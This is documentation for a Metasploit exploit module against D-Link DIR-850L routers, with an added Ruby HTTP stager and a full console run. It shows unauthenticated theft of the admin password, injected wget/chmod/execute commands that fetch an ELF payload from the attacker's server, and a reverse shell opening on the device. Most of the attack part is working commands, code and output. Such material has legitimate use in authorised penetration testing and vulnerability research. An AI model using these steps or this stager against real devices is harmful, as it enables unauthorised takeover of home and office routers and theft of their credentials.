metasploit-gs/documentation/modules/exploit/linux/http/dlink_dir850l_unauth_exec.md

## Vulnerable Application

The module `dlink_dir850l_unauth_exec` leverages an unauthenticated credential disclosure vulnerability to then execute arbitrary commands via an authenticated OS command injection
vulnerability. D-Link DIR-850L (excluding "Cloud" models) devices with firmware version up to 1.14B07
are potentially vulnerable. The vulnerability appears to lie in the handling of the device configuration. Another PoC can be found here: https://www.seebug.org/vuldb/ssvid-96333. Setting the command to `reboot` will force the router into an infinite reboot loop, so avoid it.

## Verification Steps

1. Start msfconsole
2. Do: `use exploit/linux/http/dlink_dir850l_unauth_exec`
3. Do: `set RHOST [RouterIP]`
4. Do: `set PAYLOAD linux/mipsbe/shell/reverse_tcp`
5. Do: `set LHOST [AttackerIP]` (an interface name such as `ens3` also works, as in the example below)
6. Do: `run`
7. If the router is vulnerable, the module first retrieves the admin username/password (also saved to loot), then makes the device `wget` the ELF payload from the module's web server, `chmod` it and execute it, and you should obtain a session. Note that `check` only confirms the service is running; it cannot validate the vulnerability. The module may also print "Shell never connected to us!" and "no session was created" even though a session opened a moment earlier, so run `sessions -l` before retrying.
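The last step hinges on a command stager: the module serves the ELF over HTTP, injects a command that makes the device `wget` it, then injects `chmod` and the execution. The Ruby below is an added example written for this page, not the module's code (the module uses Metasploit's own HttpServer and CmdStager mixins); it shows that staging exchange end to end with a one-shot HTTP server, a stand-in for the device's `wget`, and the timeout path that corresponds to the module's "Waiting for target to request the ELF payload..." step. The filename, the `/tmp` directory, `chmod +x`, the bind address and the placeholder ELF bytes are assumptions, not values taken from the module.

```ruby
require 'socket'
require 'securerandom'
require 'net/http'

# Added example (not the Metasploit module's code, which uses the framework's
# HttpServer/CmdStager mixins): a minimal one-shot HTTP stager showing what the
# "Starting up web service", "Asking target to request to download", "chmod"
# and "execute" lines in the run output correspond to. The payload bytes used
# in the demo are a constructed placeholder, not a real MIPS ELF.

# The shell commands the command-injection point has to run on the device, in
# the order the module issues them: download, make executable, run. The /tmp
# directory and `chmod +x` are assumptions; the module picks its own filename.
def stager_commands(url, name, dir = '/tmp')
  path = "#{dir}/#{name}"
  [
    "wget -O #{path} #{url}",
    "chmod +x #{path}",
    path
  ]
end

# Serves one payload at a random URL path, once, and reports whether the
# device actually came to fetch it.
class OneShotStager
  attr_reader :port, :uri_path, :hits

  def initialize(payload, bind_host = '127.0.0.1')
    @payload  = payload.b
    @uri_path = '/' + SecureRandom.alphanumeric(9)   # e.g. /ZUrlVeWUm
    @server   = TCPServer.new(bind_host, 0)          # port 0: OS picks a free port
    @port     = @server.addr[1]
    @hits     = 0
  end

  # URL the device is told to wget; advertise_host is the attacker-side IP the
  # device can reach (LHOST in the module).
  def url(advertise_host = '127.0.0.1')
    "http://#{advertise_host}:#{port}#{uri_path}"
  end

  # Accept connections until the payload path is requested once or the timeout
  # passes. Returns true if the ELF was served, false on timeout.
  def serve_once(timeout = 10)
    deadline = Time.now + timeout
    loop do
      remaining = deadline - Time.now
      return false if remaining <= 0 || IO.select([@server], nil, nil, remaining).nil?
      client = @server.accept
      request_line = client.gets.to_s
      # Drain the request headers up to the blank line.
      loop do
        line = client.gets
        break if line.nil? || line.strip.empty?
      end
      if request_line.start_with?("GET #{uri_path} ")
        client.write "HTTP/1.1 200 OK\r\nContent-Type: application/octet-stream\r\n" \
                     "Content-Length: #{@payload.bytesize}\r\nConnection: close\r\n\r\n"
        client.write @payload
        @hits += 1
        client.close
        return true
      end
      # Anything else (scanners, wrong path) gets a 404 and we keep waiting.
      client.write "HTTP/1.1 404 Not Found\r\nContent-Length: 0\r\nConnection: close\r\n\r\n"
      client.close
    end
  end

  def close
    @server.close
  end
end

# Stand-in for the device's side of the exchange (what `wget` does once the
# injected command runs); returns the bytes it downloaded.
def device_fetch(url)
  Net::HTTP.get_response(URI(url)).body.b
end

if __FILE__ == $PROGRAM_NAME
  elf = "\x7fELF-placeholder".b                      # constructed, not a real ELF
  stager = OneShotStager.new(elf)
  puts stager_commands(stager.url, stager.uri_path[1..-1]).join(' ; ')
  waiter = Thread.new { stager.serve_once(10) }
  device_fetch(stager.url)                           # the device fetching the ELF
  puts "payload requested: #{waiter.value}, hits: #{stager.hits}"
  stager.close
end
```

Run as-is it talks to itself on 127.0.0.1; when adapting it, bind to and advertise the address the router can reach, which is what the module's LHOST setting does. Keeping the served path random and serving it only once is what makes a stray scanner hitting the web service distinguishable from the device actually fetching the payload.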
## Example
```
msf > use exploit/linux/http/dlink_dir850l_unauth_exec
msf exploit(dlink_dir850l_unauth_exec) > set RHOST 192.168.0.14
RHOST => 192.168.0.14
msf exploit(dlink_dir850l_unauth_exec) > set RPORT 80
RPORT => 80
msf exploit(dlink_dir850l_unauth_exec) > check
[*] 192.168.0.14:80 The target service is running, but could not be validated.
msf exploit(dlink_dir850l_unauth_exec) > set VERBOSE true
VERBOSE => true
msf exploit(dlink_dir850l_unauth_exec) > set LHOST ens3
LHOST => ens3
msf exploit(dlink_dir850l_unauth_exec) > set LPORT 3131
LPORT => 3131
msf exploit(dlink_dir850l_unauth_exec) > run

[*] Started reverse TCP handler on 192.168.0.11:3131
[*] 192.168.0.14:80 - Connecting to target...
[+] 192.168.0.14:80 - Retrieved the username/password combo Admin/92830535
[+] 192.168.0.14:80 - Downloaded credentials to /root/.msf4/loot/20171104113614_default_192.168.0.14_dlink.dir850l.lo_146186.txt
[*] 192.168.0.14:80 - Starting up web service http://192.168.0.11:8080/ZUrlVeWUm
[*] Using URL: http://0.0.0.0:8080/ZUrlVeWUm
[*] Local IP: http://192.168.0.11:8080/ZUrlVeWUm
[*] 192.168.0.14:80 - Asking target to request to download http://192.168.0.11:8080/ZUrlVeWUm
[*] 192.168.0.14:80 - Waiting for target to request the ELF payload...
[*] 192.168.0.14:80 - Sending payload to the server...
[*] 192.168.0.14:80 - Requesting device to chmod ZUrlVeWUm
[*] 192.168.0.14:80 - Requesting device to execute ZUrlVeWUm
[*] 192.168.0.14:80 - Waiting 10 seconds for shell to connect back to us...
[*] Sending stage (84 bytes) to 192.168.0.14
[*] Command shell session 1 opened (192.168.0.11:3131 -> 192.168.0.14:43953) at 2017-11-04 11:36:26 -0400
[+] Deleted /tmp/uoskutcy
[-] Exploit aborted due to failure: unknown: 192.168.0.14:80 - Shell never connected to us!, disconnect?
[*] Server stopped.
[*] Exploit completed, but no session was created.
msf exploit(dlink_dir850l_unauth_exec) > sessions -i 1
[*] Starting interaction with 1...

190745749
wUVNdEKSrgeaxdSQyfTyxvaoYgFzyvGj
true
pQfaUhhwMvgnWrLpQXhhUAioNBFHPRZP
OgkEaOTPYbUEOLlLpLFEbodBvHFmVRmH
iNaYBrmsZqFyolPWWRKEHsKglrSlSGkY
pwd
/
```